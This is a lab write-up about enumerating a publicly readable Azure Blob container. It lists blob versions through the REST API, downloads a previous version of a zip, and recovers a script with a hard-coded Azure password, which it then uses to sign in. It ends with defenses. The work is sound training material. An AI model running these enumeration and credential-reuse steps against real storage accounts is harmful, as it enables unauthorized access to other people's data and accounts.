Azure Blob

This post is a summary write-up of one of the PwnedLabs virtual labs.

Failures



Blob versioning is enabled on the storage account, so previous versions of deleted or overwritten files can still be enumerated.

In addition, the container allows anonymous access, so anybody can enumerate (and download) those previous versions.

Tools

- Kali Linux

- curl

- Azure CLI

- xmllint

Discovery

The first step is to check the page source for anything interesting, such as comments left by developers.

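- Extract the URLs and identify where the website is hosted (a cloud provider such as Azure, AWS or Google Cloud?)

- If the URLs contain 'blob' (e.g. *.blob.core.windows.net), there is a good chance the site is hosted on Azure Blob Storage; this can be confirmed from the HTTP response headers (for example with curl -I)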
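A minimal bash sketch of those two checks, assuming a Kali-style shell with curl available. The function names `is_azure_blob_host` and `server_is_azure_blob` are hypothetical helpers, not part of any tool. The header check assumes Azure Blob Storage answers with a `Server: Windows-Azure-Blob/...` header, which also catches custom domains (like dev.megabigtech.com) that the hostname check alone would miss.

```bash
# Hypothetical helper: does the URL's host look like an Azure Blob Storage endpoint?
is_azure_blob_host() {
  local host
  host=$(printf '%s\n' "$1" | awk -F/ '{ print $3 }')  # scheme://HOST/path -> HOST
  host=${host%%:*}                                    # drop an optional :port
  case $host in
    *.blob.core.windows.net) return 0 ;;
    *) return 1 ;;
  esac
}

# Hypothetical helper: reads raw HTTP response headers (e.g. from `curl -sI URL`)
# on stdin and succeeds if the Server header advertises Windows-Azure-Blob.
server_is_azure_blob() {
  grep -qi '^server:.*windows-azure-blob'
}
```

Usage: `curl -sI 'http://dev.megabigtech.com/$web/index.html' | server_is_azure_blob && echo "Azure Blob Storage"`.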

PowerShell Script to Scrape URLs

Below is a script I put together with ChatGPT to scrape the URLs from a web page, group them by root domain and remove duplicates. CyberChef with a regex filter could do the same job, but I always prefer having a handy script.

```powershell
function scrapeUrl ($url) {
    # Regex matching absolute URLs: scheme://host[:port][/path]
    $filter = '([A-Za-z]+://)([-\w]+(?:\.\w[-\w]*)+)(:\d+)?(/[^.!,?"<>\[\]{}\s\x7F-\xFF]*(?:[.!,?]+[^.!,?"<>\[\]{}\s\x7F-\xFF]+)*)?'

    # Fetch the page (-UseBasicParsing avoids the IE engine dependency in Windows PowerShell 5.1)
    $res = Invoke-WebRequest -Uri $url -UseBasicParsing
    $content = $res.Content

    # Find all URLs in the content ($matches is a PowerShell automatic variable, so use another name)
    $urlMatches = [regex]::Matches($content, $filter)

    # Hash table to track URLs already seen
    $uniqueUrls = @{}

    # One object per unique URL, recording its host (group 2 of the regex)
    $urls = foreach ($m in $urlMatches) {
        $found = $m.Value
        if (-not $uniqueUrls.ContainsKey($found)) {
            $uniqueUrls[$found] = $true
            [PSCustomObject]@{
                Url        = $found
                RootDomain = $m.Groups[2].Value
            }
        }
    }

    # Group URLs by root domain
    $groupedUrls = $urls | Group-Object -Property RootDomain

    # Print the grouped URLs to the console (Write-Host keeps them out of the return value)
    foreach ($group in $groupedUrls) {
        Write-Host "Root Domain: $($group.Name)"
        $group.Group | ForEach-Object { Write-Host "  URL: $($_.Url)" }
        Write-Host ""
    }

    return $groupedUrls
}

$results = scrapeUrl -url 'https://mbtwebsite.blob.core.windows.net/$web/index.html'
```

The website we will be investigating is

http://dev.megabigtech.com/$web/index.html

Next, let's scrape its source code for all the URLs it references.
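On Kali, roughly the same extraction can be done with grep and awk. This is a sketch rather than a port of the PowerShell script: the URL regex is simpler (it stops at quotes, angle brackets and whitespace), grouping is by the host part of the URL, and `group_urls_by_host` is a hypothetical name.

```bash
# Hypothetical helper: read HTML on stdin, extract absolute URLs,
# de-duplicate them and print them grouped by host.
group_urls_by_host() {
  grep -oE '[A-Za-z]+://[^"'\''<>[:space:]]+' |
    awk -F/ '{ print $3 "\t" $0 }' |   # prefix each URL with its host
    LC_ALL=C sort -u |                 # de-duplicate, keep hosts together
    awk -F'\t' '
      $1 != prev { if (NR > 1) print ""; print "Root Domain: " $1; prev = $1 }
      { print "  URL: " $2 }'
}
```

Usage: `curl -s 'https://mbtwebsite.blob.core.windows.net/$web/index.html' | group_urls_by_host`.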

Microsoft Enumeration Docs

Microsoft documents the query parameters accepted by the Blob Storage REST API, which we can use to help enumerate blobs, for example with the List Blobs operation:



https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list

It's worth exploring the $web container to see if we can find anything else there. We can do this using a browser.

This returns all the blobs in a JSON document! We could also return just the directories in the container by



specifying the / delimiter.

https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&delimiter=%2F


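The List Blobs requests in this section differ only in their query string. A small bash sketch that builds them, where `blob_list_url` is a hypothetical helper and any extra parameters (such as `delimiter=%2F` or `include=versions`) are passed pre-encoded as the third argument:

```bash
# Hypothetical helper: build a List Blobs URL for an account and container,
# optionally appending extra, already URL-encoded query parameters.
blob_list_url() {
  local account=$1 container=$2 extra=$3
  printf 'https://%s.blob.core.windows.net/%s?restype=container&comp=list%s\n' \
    "$account" "$container" "${extra:+&$extra}"
}
```

Usage: `curl -s "$(blob_list_url mbtwebsite '$web' 'delimiter=%2F')" | xmllint --format -`. Note the single quotes around `$web` so the shell does not expand it.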

Next, we want to enumerate the container for previous blob versions.

The Microsoft documentation shows that the include=versions parameter is only supported by REST API version 2019-12-12 and later.

We can specify the API version of the operation by setting the x-ms-version header with curl, and pipe the response through xmllint to format it more readably.

```bash
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions' | xmllint --format - | less
```
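Instead of paging through the XML in less, the blob names and version IDs can be pulled out directly. A rough bash sketch (the helper name `list_blob_versions` is hypothetical); it works on either raw or xmllint-formatted XML, assumes each `<Name>` is followed by its own `<VersionId>`, and does not decode XML entities such as `&amp;`:

```bash
# Hypothetical helper: read a List Blobs XML response on stdin and print
# "blob-name<TAB>version-id" for every blob that carries a VersionId.
list_blob_versions() {
  grep -oE '<(Name|VersionId)>[^<]*</(Name|VersionId)>' |
    sed -E 's#<(Name|VersionId)>([^<]*)</[A-Za-z]+>#\1 \2#' |
    awk '{ key = $1; val = substr($0, length(key) + 2) }
         key == "Name"      { name = val }
         key == "VersionId" { print name "\t" val }'
}
```

Usage: `curl -s -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions' | list_blob_versions`.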

We see the blob scripts-transfer.zip and the version ID that will allow us to download it!

```bash
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web/scripts-transfer.zip?versionId=2024-03-29T20:55:40.8265593Z' --output scripts-transfer.zip
```

Inspecting the archive we just downloaded, we find a script with a hard-coded username and password. We check whether the credentials are still valid by running the script:

```powershell
# Import the required modules
Import-Module Az
Import-Module MSAL.PS

# Define your Azure AD credentials
$Username = "[email protected]"
$Password = "TheEagles12345!" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential ($Username, $Password)

# Authenticate to Azure AD using the specified credentials
Connect-AzAccount -Credential $Credential
```

PWNED!!
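Spotting credentials like these in a larger archive can be sped up with grep. A rough sketch, assuming the archive has been extracted first (for example `unzip -o scripts-transfer.zip -d scripts-transfer`); the keyword list and the helper name `find_hardcoded_creds` are assumptions and will miss secrets that use other names:

```bash
# Hypothetical helper: recursively search a directory for lines that look
# like credential assignments (e.g. `$Password = "..."`), case-insensitively.
find_hardcoded_creds() {
  grep -rniE '(password|passwd|secret|username|apikey|connectionstring)[[:space:]]*=' "$1"
}
```

Usage: `find_hardcoded_creds scripts-transfer` prints each match as `file:line:content`.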

Defense



To start with, the entire blob container is accessible to anonymous users and world-readable (including listing its contents), when only the website files should have been publicly accessible.
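After tightening access, one way to confirm the fix is to repeat the anonymous List Blobs request from the Discovery section and check that it is no longer answered with HTTP 200. A minimal bash sketch; the helper name `anonymous_listing_exposed` is hypothetical and it only looks at the status code:

```bash
# Hypothetical helper: returns 0 if an unauthenticated request to the URL
# succeeds with HTTP 200 (listing still exposed), 1 if the server refuses it,
# and 2 if curl itself failed (e.g. DNS or connection error).
anonymous_listing_exposed() {
  local url=$1 code
  code=$(curl -s -o /dev/null -w '%{http_code}' "$url") || return 2
  [ "$code" = 200 ]
}
```

Usage: `anonymous_listing_exposed 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list' && echo "container can still be listed anonymously"`.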

This meant that a previous version of a sensitive file was publicly discoverable and readable. To mitigate this issue, the previous version should be deleted.

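If using Azure PowerShell (the Az module), the following commands could be used. First set the storage account context (replace `<resource-group>` with the storage account's resource group):

```powershell
Set-AzCurrentStorageAccount -ResourceGroupName '<resource-group>' -Name 'mbtwebsite'
```

In the context of this guide, the previous version would then be removed with:

```powershell
Remove-AzStorageBlob -Container '$web' -Blob 'scripts-transfer.zip' -VersionId '2024-03-29T20:55:40.8265593Z'
```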

Also, credentials should never be hard-coded in any of your code. They should be stored in a PAM (Privileged Access Management) system, a password manager, or a service such as Azure Key Vault.

Key Vault allows you to securely store and access keys, passwords, certificates, and other secrets.
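As an illustration of keeping the password out of the script, here is a bash sketch that reads it at run time instead: first from an environment variable (for example one injected by a CI pipeline), otherwise from Key Vault via `az keyvault secret show`. The helper name `get_secret` and the vault/secret names in the usage line are hypothetical, and the Key Vault path assumes you are already signed in with `az login`:

```bash
# Hypothetical helper: return a secret without hard-coding it.
# $1 = environment variable to check first, $2 = Key Vault name, $3 = secret name.
get_secret() {
  local env_name=$1 vault=$2 secret=$3 value
  if value=$(printenv "$env_name") && [ -n "$value" ]; then
    printf '%s\n' "$value"            # value supplied by the environment
  else
    az keyvault secret show --vault-name "$vault" --name "$secret" \
      --query value --output tsv      # fall back to Azure Key Vault
  fi
}
```

Usage: `password=$(get_secret APP_PASSWORD my-vault app-password)`.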
